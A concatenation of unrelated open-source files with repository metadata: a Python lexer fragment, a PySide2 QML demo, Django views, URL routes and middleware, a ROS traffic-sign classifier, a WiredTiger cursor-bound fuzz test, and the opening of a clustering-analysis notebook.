return Simbolo(self.Lexema, TOKENS['CONST_CHAR'])
elif self.estado == 31:
if c == "/":
self.estado = 32
else:
self.estado = self.fallo()
elif self.estado == 32:
c = self.siguiente_caracter()
if c == "/":
self.estado = 34
elif c == "*":
self.estado = 33
else:
c = self.deshacer_automata()
self.estado = self.fallo()
elif self.estado == 33:
c = self.siguiente_caracter()
if c == "*":
self.estado = 35
elif self.estado == 34:
c = self.siguiente_caracter()
if c == "\n" or c == "\0":
self.estado = 36
elif self.estado == 35:
c = self.siguiente_caracter()
if c == "/":
self.estado = 37
else:
self.estado = 33
elif self.estado == 36:
self.regresa_caracter()
self.leer_lexema()
elif self.estado == 37:
self.leer_lexema()
elif self.estado == 38:
if c in self.caracteres_permitidos:
self.leer_lexema()
return Simbolo(c,ord(c))
else:
self.estado = self.fallo()
else:
self.leer_lexema()
self.error.reportar_error(self.num_linea, "Lexico", "Simbolo no permitido '{}'.".format(self.Lexema))
def fallo(self):
if self.estado <= 8:
return 9
elif self.estado <= 11:
return 12
elif self.estado <= 21:
return 22
elif self.estado <= 25:
return 26
elif self.estado <= 30:
return 31
elif self.estado <= 37:
return 38
else:
return 99
| AbrahamupSky/Compilador | lexico/lexico.py | lexico.py | py | 12,471 | python | es | code | 1 | github-code | 36 |
17887984325 | from PySide2.QtCore import QUrl, QObject, Slot
from PySide2.QtGui import QGuiApplication
from PySide2.QtQuick import QQuickView
class MyClass(QObject):
    """QObject exposed to QML so its slots can be invoked from QML code."""
    @Slot(int, result=str)  # declared as a slot: takes an int, returns a str
    def returnValue(self, value):
        """Return value + 10, formatted as a string."""
        return str(value + 10)
if __name__ == '__main__':
    path = 'src/demo1.qml'
    app = QGuiApplication([])
    view = QQuickView()
    con = MyClass()
    # Expose the Python object to QML under the context name "con".
    context = view.rootContext()
    context.setContextProperty("con", con)
    # Let the QML engine's quit signal close the application.
    view.engine().quit.connect(app.quit)
    view.setSource(QUrl(path))
    view.show()
    app.exec_()
| pyminer/pyminer | pyminer/widgets/widgets/basic/quick/demo1.py | demo1.py | py | 635 | python | en | code | 77 | github-code | 36 |
2153945744 | from django.shortcuts import render
# Price lookup table: product name -> unit price.
product_price = {"라면":980,"홈런볼":1500,"칙촉":2300, "식빵":1800}
# Create your views here.
def price(request, thing, cnt):
    """Render the price page for ``cnt`` units of product ``thing``.

    Unknown products get ``y_n='n'`` and a price/total of 0.
    """
    found = thing in product_price
    unit_price = product_price.get(thing, 0)
    context = {
        'y_n': 'y' if found else 'n',
        'price': unit_price,
        'thing': thing,
        'cnt': cnt,
        'total': unit_price * cnt,
    }
    return render(request, 'prices/price.html', context)
28536518861 | """project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import (
include,
url,
)
from django.contrib import admin
from classifier.views import CreateClassification
from healthcheck.views import HealthCheck
from report.views import CreateReport
from secret.views import Secret
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    # Djoser endpoints: user management plus token-based authentication.
    url(r'^auth/', include('djoser.urls')),
    url(r'^auth/', include('djoser.urls.authtoken')),
    url(
        r'^classify-image',
        CreateClassification.as_view(),
        name='classify-image',
    ),
    url(r'^health', HealthCheck.as_view(), name='healthcheck'),
    url(r'^report', CreateReport.as_view(), name='report'),
    url(r'^secret', Secret.as_view(), name='secret'),
]
| mechtron/coreys-image-classifier | api/project/urls.py | urls.py | py | 1,341 | python | en | code | 3 | github-code | 36 |
4308544287 | #!/usr/bin/env python3
import numpy as np
from tensorflow.keras.preprocessing.image import load_img, img_to_array
import rospy
from std_msgs.msg import UInt16
import os
from tensorflow.keras.models import load_model
def process_image(img_path):
    """Load an image, resize it to 30x30 and prepend a batch dimension."""
    loaded = load_img(img_path, target_size=(30, 30))
    batch = img_to_array(loaded)[np.newaxis, ...]
    return batch
def predict_model(img_path, model):
    """Classify the image at ``img_path`` with ``model``.

    Returns the human-readable label of the highest-probability class
    (labels are indexed by the model's output class id) and prints it.
    """
    labels = ['20 km/h', '30 km/h', '50 km/h', '60 km/h', '70 km/h', '80 km/h', '80 km/h end', '100 km/h',
              '120 km/h', 'No overtaking', 'No overtaking for tracks', 'Crossroad with secondary way',
              'Main road', 'Give way', 'Stop', 'Road up', 'Road up for track', 'Brock', 'Other dangerous',
              'Turn left', 'Turn right', 'Winding road', 'Hollow road', 'Slippery road', 'Narrowing road',
              'Roadwork', 'Traffic light', 'Pedestrian', 'Children', 'Bike', 'Snow', 'Deer', 'End of the limits',
              'Only right', 'Only left', 'Only straight', 'Only straight and right', 'Only straight and left',
              'Take right', 'Take left', 'Circle crossroad', 'End of overtaking limit', 'End of overtaking limit for track']
    image = process_image(img_path)
    # argmax over the class axis gives the predicted class id.
    pred = np.argmax(model.predict(image), axis=1)
    prediction = labels[pred[0]]
    print(prediction)
    return prediction
# Map recognized signs to motor command codes; anything else means "go straight".
_SIGN_TO_COMMAND = {
    'Stop': 2,
    'Only right': 3,
    'Only left': 4,
}

def choose_way(sign):
    """Translate a classified sign name into a motor command code.

    Returns 2 for 'Stop', 3 for 'Only right', 4 for 'Only left' and
    1 (drive straight) for any other sign.
    """
    return _SIGN_TO_COMMAND.get(sign, 1)
# Force TensorFlow onto the CPU by hiding all CUDA devices.
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
MODEL_PATH = '/home/adam/catkin_ws/src/robot_tsr/script/model-1.h5'
# Load the trained classifier once at module import time.
model = load_model(MODEL_PATH)
def main():
    """Classify the test image and return its predicted sign label."""
    # NOTE(review): the image path is hard-coded to a fixed test file —
    # presumably a camera frame should be used here; confirm.
    file_path = f'/home/adam/catkin_ws/src/robot_tsr/script/uploads/stop.jpeg'
    sign = predict_model(file_path, model)
    return sign
def talker():
    """Publish motor command codes derived from classified signs on 'dc_motors'."""
    signs_publisher = rospy.Publisher('dc_motors', UInt16, queue_size=10)
    rospy.init_node('talker', anonymous=True)
    rate = rospy.Rate(10)  # 10 Hz
    while not rospy.is_shutdown():
        new_sign = main()
        # Translate the sign into a motor command value.
        msg = choose_way(new_sign)
        rospy.loginfo(msg)
        signs_publisher.publish(msg)
        rate.sleep()
if __name__ == '__main__':
    try:
        talker()
    except rospy.ROSInterruptException:
        # Raised when the node is shut down (e.g. Ctrl-C); exit quietly.
        pass
| FitAdam/Package-TSR-Robot-Ros | script/signs_pub.py | signs_pub.py | py | 2,438 | python | en | code | 0 | github-code | 36 |
36955296199 | import wiredtiger, wttest, string, random, time
from wtbound import *
from enum import Enum
from wtscenario import make_scenarios
# Mutating operations the fuzzer can apply to the key range.
class operations(Enum):
    UPSERT = 1
    REMOVE = 2
    TRUNCATE = 3

# Tracked visibility state of a key in the in-memory model.
class key_states(Enum):
    UPSERTED = 1
    DELETED = 2
    NONE = 3

# Cursor operations validated against a bounded cursor.
class bound_scenarios(Enum):
    NEXT = 1
    PREV = 2
    SEARCH = 3
    SEARCH_NEAR = 4

# Which end of the bound range is being referred to.
class bound_type(Enum):
    LOWER = 1
    UPPER = 2
class key():
    """In-memory model of one key in the table.

    Tracks the key's data, value, visibility state (a key_states member),
    prepared flag and last-modified timestamp so the fuzzer can validate
    what the database returns.
    """
    def __init__(self, data, value, key_state, timestamp):
        """Record a key with its value, state and timestamp."""
        self.key_state = key_state
        self.data = data
        self.value = value
        self.timestamp = timestamp
        # Previously relied on a class-level default; initialize explicitly.
        self.prepared = False

    def clear_prepared(self):
        """Mark the key as no longer part of a prepared transaction."""
        self.prepared = False

    def is_prepared(self):
        """Return True if the key belongs to an uncommitted prepared txn."""
        return self.prepared

    def is_deleted(self):
        """Return True if the key is currently deleted."""
        return self.key_state == key_states.DELETED

    def is_out_of_bounds(self, bound_set):
        """Return True if the key falls outside the given bound set."""
        return not bound_set.in_bounds_key(self.data)

    def is_deleted_or_oob(self, bound_set):
        """Return True if the key is deleted or outside the bound set."""
        return self.is_deleted() or self.is_out_of_bounds(bound_set)

    def update(self, value, key_state, timestamp, prepare):
        """Apply a new value/state/timestamp and record the prepared flag."""
        self.value = value
        self.key_state = key_state
        self.timestamp = timestamp
        self.prepared = prepare

    def to_string(self):
        """Return a human-readable summary of the key for debug logging."""
        return "Key: " + str(self.data) + ", state: " + str(self.key_state) + ", prepared: " + str(self.prepared)

    def equals(self, key, value):
        """Return True if this key is visible (upserted) and matches key/value."""
        return (self.key_state == key_states.UPSERTED
                and self.data == key and self.value == value)
# test_cursor_bound_fuzz.py
# A python test fuzzer that generates a random key range and applies bounds to it, then runs
# randomized operations and validates them for correctness.
class test_cursor_bound_fuzz(wttest.WiredTigerTestCase):
file_name = 'test_fuzz.wt'
iteration_count = 200 if wttest.islongtest() else 50
# For each iteration we do search_count searches that way we test more cases without having to
# generate as many key ranges.
search_count = 20
key_count = 10000 if wttest.islongtest() else 1000
# Large transactions throw rollback errors so we don't use them in the long test.
transactions_enabled = False if wttest.islongtest() else True
value_size = 100000 if wttest.islongtest() else 100
prepare_frequency = 5/100
update_frequency = 2/10
min_key = 1
# Max_key is not inclusive so the actual max_key is max_key - 1.
max_key = min_key + key_count
# A lot of time was spent generating values, to achieve some amount of randomness we pre
# generate N values and keep them in memory.
value_array = []
value_array_size = 20
current_ts = 1
applied_ops = False
key_range = {}
types = [
('file', dict(uri='file:')),
('table', dict(uri='table:'))
]
data_format = [
('row', dict(key_format='i')),
('column', dict(key_format='r'))
]
scenarios = make_scenarios(types, data_format)
# Iterates valid keys from min_key to max_key, the maximum key is defined as max_key - 1.
# Python doesn't consider the end of the range as inclusive.
def key_range_iter(self):
for i in range(self.min_key, self.max_key):
yield i
    def dump_key_range(self):
        """Log the tracked state of every key (debugging aid)."""
        for i in self.key_range_iter():
            self.pr(self.key_range[i].to_string())
# Generate a random ascii value.
def generate_value(self):
return ''.join(random.choice(string.ascii_lowercase) for _ in range(self.value_size))
# Get a value from the value array.
def get_value(self):
return self.value_array[random.randrange(self.value_array_size)]
# Get a key within the range of min_key and max_key.
def get_random_key(self):
return random.randrange(self.min_key, self.max_key)
# Update a key using the cursor and update its in memory representation.
    def apply_update(self, cursor, key_id, prepare):
        """Write a random value for key_id and mirror it in the in-memory model."""
        value = self.get_value()
        cursor[key_id] = value
        self.key_range[key_id].update(value, key_states.UPSERTED, self.current_ts, prepare)
        self.verbose(3, "Updating " + self.key_range[key_id].to_string())
# Remove a key using the cursor and mark it as deleted in memory.
# If the key is already deleted we skip the remove.
    def apply_remove(self, cursor, key_id, prepare):
        """Remove key_id via the cursor and mark it deleted in the model.

        Skips keys that are already deleted.
        """
        if (self.key_range[key_id].is_deleted()):
            return
        cursor.set_key(key_id)
        self.assertEqual(cursor.remove(), 0)
        self.key_range[key_id].update(None, key_states.DELETED, self.current_ts, prepare)
        self.verbose(3, "Removing " + self.key_range[key_id].to_string())
# Apply a truncate operation to the key range.
    def apply_truncate(self, session, cursor, cursor2, prepare):
        """Truncate a random key range and mark those keys deleted in the model."""
        lower_key = self.get_random_key()
        if (lower_key + 1 < self.max_key):
            upper_key = random.randrange(lower_key + 1, self.max_key)
            cursor.set_key(lower_key)
            cursor2.set_key(upper_key)
            self.assertEqual(session.truncate(None, cursor, cursor2, None), 0)
            # Mark all keys from lower_key to upper_key as deleted.
            for key_id in range(lower_key, upper_key + 1):
                self.key_range[key_id].update(None, key_states.DELETED, self.current_ts, prepare)
            self.verbose(3, "Truncated keys between: " + str(lower_key) + " and: " + str(upper_key))
# Each iteration calls this function once to update the state of the keys in the database and
# in memory.
    def apply_ops(self, session, cursor, prepare):
        """Apply one iteration of random mutations to the table and the model.

        Either performs a single truncate (only once data exists), or walks
        the key range applying random upserts/removes, skipping a fraction
        of keys per update_frequency.
        """
        op = random.choice(list(operations))
        if (op is operations.TRUNCATE and self.applied_ops):
            cursor2 = session.open_cursor(self.uri + self.file_name)
            self.apply_truncate(session, cursor, cursor2, prepare)
        else:
            for i in self.key_range_iter():
                if (random.uniform(0, 1) < self.update_frequency):
                    continue
                op = random.choice(list(operations))
                if (op is operations.TRUNCATE):
                    # Truncate is only applied as a whole-iteration operation.
                    pass
                elif (op is operations.UPSERT):
                    self.apply_update(cursor, i, prepare)
                elif (op is operations.REMOVE):
                    self.apply_remove(cursor, i, prepare)
                else:
                    raise Exception("Unhandled operation generated")
        self.applied_ops = True
# As prepare throws a prepare conflict exception we wrap the call to anything that could
# encounter a prepare conflict in a try except, we then return the error code to the caller.
    def prepare_call(self, func):
        """Invoke func(), converting a prepare-conflict exception to its code.

        Any other WiredTigerError is re-raised unchanged.
        """
        try:
            ret = func()
        except wiredtiger.WiredTigerError as e:
            if wiredtiger.wiredtiger_strerror(wiredtiger.WT_PREPARE_CONFLICT) in str(e):
                ret = wiredtiger.WT_PREPARE_CONFLICT
            else:
                raise e
        return ret
# Once we commit the prepared transaction, update and clear the prepared flags.
    def clear_prepare_key_ranges(self):
        """Clear the prepared flag on every key after the prepared txn commits."""
        for i in self.key_range_iter():
            self.key_range[i].clear_prepared()
# Given a bound, this functions returns the start or end expected key of the bounded range.
# Note the type argument determines if we return the start or end limit. e.g. if we have a lower
# bound then the key would be the lower bound, however if the lower bound isn't enabled then the
# lowest possible key would be min_key. max_key isn't inclusive so we subtract 1 off it.
    def get_expected_limit_key(self, bound_set, type):
        """Return the first (LOWER) or last (UPPER) key of the bounded range.

        Falls back to min_key / max_key - 1 when the corresponding bound is
        disabled; non-inclusive bounds are shifted inward by one.
        """
        if (type == bound_type.LOWER):
            if (bound_set.lower.enabled):
                if (bound_set.lower.inclusive):
                    return bound_set.lower.key
                return bound_set.lower.key + 1
            return self.min_key
        if (bound_set.upper.enabled):
            if (bound_set.upper.inclusive):
                return bound_set.upper.key
            return bound_set.upper.key - 1
        return self.max_key - 1
# When a prepared cursor walks next or prev it can skip deleted records internally before
# returning a prepare conflict, we don't know which key it got to so we need to validate that
# we see a series of deleted keys followed by a prepared key.
    def validate_deleted_prepared_range(self, start_key, end_key, next):
        """Check a range consists of deleted keys followed by a prepared key.

        Walks forward when next is True, backward otherwise; returns as soon
        as a prepared key is found and fails on any visible (upserted) key.
        """
        if (next):
            step = 1
        else:
            step = -1
        self.verbose(3, "Walking deleted range from: " + str(start_key) + " to: " + str(end_key))
        for i in range(start_key, end_key, step):
            self.verbose(3, "Validating state of key: " + self.key_range[i].to_string())
            if (self.key_range[i].is_prepared()):
                return
            elif (self.key_range[i].is_deleted()):
                continue
            else:
                self.assertTrue(False)
# Validate a prepare conflict in the cursor->next scenario.
    def validate_prepare_conflict_next(self, current_key, bound_set):
        """Validate a prepare conflict returned while walking forwards."""
        self.verbose(3, "Current key is: " + str(current_key) + " min_key is: " + str(self.min_key))
        start_range = None
        if current_key == self.min_key:
            # We hit a prepare conflict while walking forwards before we stepped to a valid key.
            # Therefore validate all the keys from start of the range are deleted followed by a prepare.
            start_range = self.get_expected_limit_key(bound_set, bound_type.LOWER)
        else:
            # We walked part of the way through a valid key range before we hit the prepared
            # update. Therefore validate the range between our current key and the
            # end range.
            start_range = current_key
        end_range = self.get_expected_limit_key(bound_set, bound_type.UPPER)
        # Perform validation from the start range to end range.
        self.validate_deleted_prepared_range(start_range, end_range, True)
# Validate a prepare conflict in the cursor->prev scenario.
    def validate_prepare_conflict_prev(self, current_key, bound_set):
        """Validate a prepare conflict returned while walking backwards."""
        self.verbose(3, "Current key is: " + str(current_key) + " max_key is: " + str(self.max_key))
        start_range = None
        if current_key == self.max_key - 1:
            # We hit a prepare conflict while walking backwards before we stepped to a valid key.
            # Therefore validate all the keys from start of the range are deleted followed by a
            # prepare.
            start_range = self.get_expected_limit_key(bound_set, bound_type.UPPER)
        else:
            # We walked part of the way through a valid key range before we hit the prepared
            # update. Therefore validate the range between our current key and the
            # end range.
            start_range = current_key
        end_range = self.get_expected_limit_key(bound_set, bound_type.LOWER)
        # Perform validation from the start range to end range.
        self.validate_deleted_prepared_range(start_range, end_range, False)
# Walk the cursor using cursor->next and validate the returned keys.
    def run_next(self, bound_set, cursor):
        """Walk the bounded cursor forwards and validate every returned key.

        Every key the cursor returns must be in bounds and match the model;
        every key the cursor skips must be deleted or out of bounds.  A
        prepare conflict stops the walk and is validated separately.
        """
        # This array gives us confidence that we have validated the full key range.
        checked_keys = []
        self.verbose(3, "Running scenario: NEXT")
        key_range_it = self.min_key - 1
        ret = self.prepare_call(lambda: cursor.next())
        while (ret != wiredtiger.WT_NOTFOUND and ret != wiredtiger.WT_PREPARE_CONFLICT):
            current_key = cursor.get_key()
            current_value = cursor.get_value()
            self.verbose(3, "Cursor next walked to key: " + str(current_key) + " value: " + current_value)
            self.assertTrue(bound_set.in_bounds_key(current_key))
            self.assertTrue(self.key_range[current_key].equals(current_key, current_value))
            checked_keys.append(current_key)
            # If the cursor has walked to a record that isn't +1 our current record then it
            # skipped something internally.
            # Check that the key range between key_range_it and current_key isn't visible
            if (current_key != key_range_it + 1):
                for i in range(key_range_it + 1, current_key):
                    self.verbose(3, "Checking key is deleted or oob: " + str(i))
                    checked_keys.append(i)
                    self.assertTrue(self.key_range[i].is_deleted_or_oob(bound_set))
            key_range_it = current_key
            ret = self.prepare_call(lambda: cursor.next())
        key_range_it = key_range_it + 1
        # If we were returned a prepare conflict it means the cursor has found a prepared key/value.
        # We need to validate that it arrived there correctly using the in memory state of the
        # database. We cannot continue from a prepare conflict so we return.
        if (ret == wiredtiger.WT_PREPARE_CONFLICT):
            self.validate_prepare_conflict_next(key_range_it, bound_set)
            return
        # If key_range_it is < key_count then the rest of the range was deleted
        # Remember to increment it by one to get it to the first not in bounds key.
        for i in range(key_range_it, self.max_key):
            checked_keys.append(i)
            self.verbose(3, "Checking key is deleted or oob: " + str(i))
            self.assertTrue(self.key_range[i].is_deleted_or_oob(bound_set))
        self.assertTrue(len(checked_keys) == self.key_count)
# Walk the cursor using cursor->prev and validate the returned keys.
    def run_prev(self, bound_set, cursor):
        """Walk the bounded cursor backwards and validate every returned key.

        Mirror image of run_next: returned keys must be in bounds and match
        the model, skipped keys must be deleted or out of bounds, and a
        prepare conflict stops the walk and is validated separately.
        """
        # This array gives us confidence that we have validated the full key range.
        checked_keys = []
        self.verbose(3, "Running scenario: PREV")
        ret = self.prepare_call(lambda: cursor.prev())
        key_range_it = self.max_key
        while (ret != wiredtiger.WT_NOTFOUND and ret != wiredtiger.WT_PREPARE_CONFLICT):
            current_key = cursor.get_key()
            current_value = cursor.get_value()
            self.verbose(3, "Cursor prev walked to key: " + str(current_key) + " value: " + current_value)
            self.assertTrue(bound_set.in_bounds_key(current_key))
            self.assertTrue(self.key_range[current_key].equals(current_key, current_value))
            checked_keys.append(current_key)
            # If the cursor has walked to a record that isn't -1 our current record then it
            # skipped something internally.
            # Check that the key range between key_range_it and current_key isn't visible
            if (current_key != key_range_it - 1):
                # Check that the key range between key_range_it and current_key isn't visible
                for i in range(current_key + 1, key_range_it):
                    self.verbose(3, "Checking key is deleted or oob: " + str(i))
                    checked_keys.append(i)
                    self.assertTrue(self.key_range[i].is_deleted_or_oob(bound_set))
            key_range_it = current_key
            ret = self.prepare_call(lambda: cursor.prev())
        # If key_range_it is > key_count then the rest of the range was deleted
        key_range_it -= 1
        if (ret == wiredtiger.WT_PREPARE_CONFLICT):
            self.validate_prepare_conflict_prev(key_range_it, bound_set)
            return
        for i in range(self.min_key, key_range_it + 1):
            checked_keys.append(i)
            self.verbose(3, "Checking key is deleted or oob: " + str(i))
            self.assertTrue(self.key_range[i].is_deleted_or_oob(bound_set))
        self.assertTrue(len(checked_keys) == self.key_count)
# Run basic cursor->search() scenarios and validate the outcome.
    def run_search(self, bound_set, cursor):
        """Search for random keys and validate each outcome against the model."""
        # Choose a N random keys and perform a search on each
        for i in range(0, self.search_count):
            search_key = self.get_random_key()
            cursor.set_key(search_key)
            ret = self.prepare_call(lambda: cursor.search())
            if (ret == wiredtiger.WT_PREPARE_CONFLICT):
                self.assertTrue(self.key_range[search_key].is_prepared())
            elif (ret == wiredtiger.WT_NOTFOUND):
                self.assertTrue(self.key_range[search_key].is_deleted_or_oob(bound_set))
            elif (ret == 0):
                # Assert that the key exists, and is within the range.
                self.assertTrue(self.key_range[search_key].equals(cursor.get_key(), cursor.get_value()))
                self.assertTrue(bound_set.in_bounds_key(cursor.get_key()))
            else:
                raise Exception('Unhandled error returned by search')
# Check that all the keys within the given bound_set are deleted.
    def check_all_within_bounds_not_visible(self, bound_set):
        """Return True if every key inside the bound set is deleted."""
        for i in range(bound_set.start_range(self.min_key), bound_set.end_range(self.max_key)):
            self.verbose(3, "checking key: " +self.key_range[i].to_string())
            if (not self.key_range[i].is_deleted()):
                return False
        return True
# Run a cursor->search_near scenario and validate that the outcome was correct.
    def run_search_near(self, bound_set, cursor):
        """Search-near random keys and validate the returned key is correct.

        For in-bounds searches, the nearest visible key must be returned and
        all keys between it and the search key must be deleted.  For
        out-of-bounds searches, the returned key must be the closest visible
        key to the violated bound.
        """
        # Choose N random keys and perform a search near.
        for i in range(0, self.search_count):
            search_key = self.get_random_key()
            cursor.set_key(search_key)
            self.verbose(3, "Searching for key: " + str(search_key))
            ret = self.prepare_call(lambda: cursor.search_near())
            if (ret == wiredtiger.WT_NOTFOUND):
                self.verbose(3, "Nothing visible checking.")
                # Nothing visible within the bound range.
                # Validate.
            elif (ret == wiredtiger.WT_PREPARE_CONFLICT):
                # Due to the complexity of the search near logic we will simply check if there is
                # a prepared key within the range.
                found_prepare = False
                for i in range(bound_set.start_range(self.min_key), bound_set.end_range(self.max_key)):
                    if (self.key_range[i].is_prepared()):
                        found_prepare = True
                        break
                self.assertTrue(found_prepare)
                self.verbose(3, "Received prepare conflict in search near.")
            else:
                key_found = cursor.get_key()
                self.verbose(3, "Found a key: " + str(key_found))
                current_key = key_found
                # Assert the value we found matches.
                # Equals also validates that the key is visible.
                self.assertTrue(self.key_range[current_key].equals(current_key, cursor.get_value()))
                if (bound_set.in_bounds_key(search_key)):
                    # We returned a key within the range, validate that key is the one that
                    # should've been returned.
                    if (key_found == search_key):
                        # We've already determined the key matches. We can return.
                        pass
                    if (key_found > search_key):
                        # Walk left and validate that all isn't visible to the search key.
                        while (current_key != search_key):
                            current_key = current_key - 1
                            self.assertTrue(self.key_range[current_key].is_deleted())
                    if (key_found < search_key):
                        # Walk right and validate that all isn't visible to the search key.
                        while (current_key != search_key):
                            current_key = current_key + 1
                            self.assertTrue(self.key_range[current_key].is_deleted())
                else:
                    # We searched for a value outside our range, we should return whichever value
                    # is closest within the range.
                    if (bound_set.lower.enabled and search_key <= bound_set.lower.key):
                        # We searched to the left of our bounds. In the equals case the lower bound
                        # must not be inclusive.
                        # Validate that the we returned the nearest value to the lower bound.
                        if (bound_set.lower.inclusive):
                            self.assertTrue(key_found >= bound_set.lower.key)
                            current_key = bound_set.lower.key
                        else:
                            self.assertTrue(key_found > bound_set.lower.key)
                            current_key = bound_set.lower.key + 1
                        while (current_key != key_found):
                            self.assertTrue(self.key_range[current_key].is_deleted())
                            current_key = current_key + 1
                    elif (bound_set.upper.enabled and search_key >= bound_set.upper.key):
                        # We searched to the right of our bounds. In the equals case the upper bound
                        # must not be inclusive.
                        # Validate that the we returned the nearest value to the upper bound.
                        if (bound_set.upper.inclusive):
                            self.assertTrue(key_found <= bound_set.upper.key)
                            current_key = bound_set.upper.key
                        else:
                            self.assertTrue(key_found < bound_set.upper.key)
                            current_key = bound_set.upper.key - 1
                        while (current_key != key_found):
                            self.assertTrue(self.key_range[current_key].is_deleted())
                            current_key = current_key - 1
                    else:
                        raise Exception('Illegal state found in search_near')
# Choose a scenario and run it.
    def run_bound_scenarios(self, bound_set, cursor):
        """Pick a random cursor scenario (next/prev/search/search_near) and run it."""
        scenario = random.choice(list(bound_scenarios))
        if (scenario is bound_scenarios.NEXT):
            self.run_next(bound_set, cursor)
        elif (scenario is bound_scenarios.PREV):
            self.run_prev(bound_set, cursor)
        elif (scenario is bound_scenarios.SEARCH):
            self.run_search(bound_set, cursor)
        elif (scenario is bound_scenarios.SEARCH_NEAR):
            self.run_search_near(bound_set, cursor)
        else:
            raise Exception('Unhandled bound scenario chosen')
# Generate a set of bounds and apply them to the cursor.
    def apply_bounds(self, cursor):
        """Generate a random bound set, apply it to the cursor and return it.

        Enabled/inclusive flags are randomized; equal enabled bounds are
        forced inclusive so the configuration stays valid.
        """
        cursor.reset()
        lower = bound(self.get_random_key(), bool(random.getrandbits(1)), bool(random.getrandbits(1)))
        upper = bound(random.randrange(lower.key, self.max_key), bool(random.getrandbits(1)), bool(random.getrandbits(1)))
        # Prevent invalid bounds being generated.
        if (lower.key == upper.key and lower.enabled and upper.enabled):
            lower.inclusive = upper.inclusive = True
        bound_set = bounds(lower, upper)
        if (lower.enabled):
            cursor.set_key(lower.key)
            cursor.bound("bound=lower,inclusive=" + lower.inclusive_str())
        if (upper.enabled):
            cursor.set_key(upper.key)
            cursor.bound("bound=upper,inclusive=" + upper.inclusive_str())
        return bound_set
# The primary test loop is contained here.
def test_bound_fuzz(self):
uri = self.uri + self.file_name
create_params = 'value_format=S,key_format={}'.format(self.key_format)
# Reset the key range for every scenario.
self.key_range = {}
# Setup a reproducible random seed.
# If this test fails inspect the file WT_TEST/results.txt and replace the time.time()
# with a given seed. e.g.:
# seed = 1660215872.5926154
# Additionally this test is configured for verbose logging which can make debugging a bit
# easier.
seed = time.time()
self.pr("Using seed: " + str(seed))
random.seed(seed)
self.session.create(uri, create_params)
read_cursor = self.session.open_cursor(uri)
write_session = self.setUpSessionOpen(self.conn)
write_cursor = write_session.open_cursor(uri)
# Initialize the value array.
self.verbose(3, "Generating value array")
for i in range(0, self.value_array_size):
self.value_array.append(self.generate_value())
# Initialize the key range.
for i in self.key_range_iter():
key_value = self.get_value()
self.key_range[i] = key(i, key_value, key_states.UPSERTED, self.current_ts)
self.current_ts += 1
if (self.transactions_enabled):
write_session.begin_transaction()
write_cursor[i] = key_value
if (self.transactions_enabled):
write_session.commit_transaction('commit_timestamp=' + self.timestamp_str(self.key_range[i].timestamp))
self.session.checkpoint()
# Begin main loop
for i in range(0, self.iteration_count):
self.verbose(3, "Iteration: " + str(i))
bound_set = self.apply_bounds(read_cursor)
self.verbose(3, "Generated bound set: " + bound_set.to_string())
# Check if we are doing a prepared transaction on this iteration.
prepare = random.uniform(0, 1) <= self.prepare_frequency and self.transactions_enabled
if (self.transactions_enabled):
write_session.begin_transaction()
self.apply_ops(write_session, write_cursor, prepare)
if (self.transactions_enabled):
if (prepare):
self.verbose(3, "Preparing applied operations.")
write_session.prepare_transaction('prepare_timestamp=' + self.timestamp_str(self.current_ts))
else:
write_session.commit_transaction('commit_timestamp=' + self.timestamp_str(self.current_ts))
# Use the current timestamp so we don't need to track previous versions.
if (self.transactions_enabled):
self.session.begin_transaction('read_timestamp=' + self.timestamp_str(self.current_ts))
self.run_bound_scenarios(bound_set, read_cursor)
if (self.transactions_enabled):
self.session.rollback_transaction()
if (prepare):
write_session.commit_transaction(
'commit_timestamp=' + self.timestamp_str(self.current_ts) +
',durable_timestamp='+ self.timestamp_str(self.current_ts))
self.clear_prepare_key_ranges()
self.current_ts += 1
if (i % 10 == 0):
# Technically this is a write but easier to do it with this session.
self.session.checkpoint()
if __name__ == '__main__':
wttest.run()
| mongodb/mongo | src/third_party/wiredtiger/test/suite/test_cursor_bound_fuzz.py | test_cursor_bound_fuzz.py | py | 27,014 | python | en | code | 24,670 | github-code | 36 |
6789488341 | from django.contrib import auth
from django.core.exceptions import ObjectDoesNotExist
from .models import Member
class EcosystemActivityMiddleware:
EXTENSIONS_EXCLUDED = ['js', 'map', 'css']
PATHS_EXCLUDED = ['/api/graphql-jwt']
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
user = self._get_user(request)
if user.is_authenticated and \
request.method in ['POST', 'PUT', 'DELETE']:
try:
member = Member.objects.get(user=user)
member.update_activity()
except ObjectDoesNotExist:
pass
return self.get_response(request)
def _get_user(self, request):
if not hasattr(request, '_cached_user'):
request._cached_user = auth.get_user(request)
return request._cached_user
| tomasgarzon/exo-services | service-exo-core/ecosystem/middleware.py | middleware.py | py | 888 | python | en | code | 0 | github-code | 36 |
72743077225 | # ---
# jupyter:
# jupytext:
# cell_metadata_filter: -all
# comment_magics: true
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.7
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# %% [markdown]
# # Exploratory cluster analysis
# %%
# Exploratory cluster analysis
# %load_ext autoreload
# %autoreload 2
# %% [markdown]
# ## Preamble
# %%
import altair as alt
import numpy as np
from scipy.stats import ttest_ind
import pandas as pd
import requests
from toolz import pipe
from afs_neighbourhood_analysis.getters.clustering import clustering_diagnostics
from afs_neighbourhood_analysis.pipeline.lad_clustering.cluster_utils import (
extract_clusters,
clustering_params,
)
from afs_neighbourhood_analysis.getters.clustering import (
early_years_for_clustering,
public_health_for_clustering,
)
# %%
phf_long
# %%
def fetch_geojson(url):
return pipe(
requests.get(url),
lambda req: [e["properties"] for e in req.json()["features"]],
pd.DataFrame,
)
def make_code_name_lookup():
county_json = pipe(
fetch_geojson(
"https://services1.arcgis.com/ESMARspQHYMw9BZ9/arcgis/rest/services/CTY_APR_2019_EN_NC/FeatureServer/0/query?outFields=*&where=1%3D1&f=geojson"
),
lambda df: df.set_index("CTY19CD")["CTY19NM"].to_dict(),
)
lad_json = (
pd.read_excel(
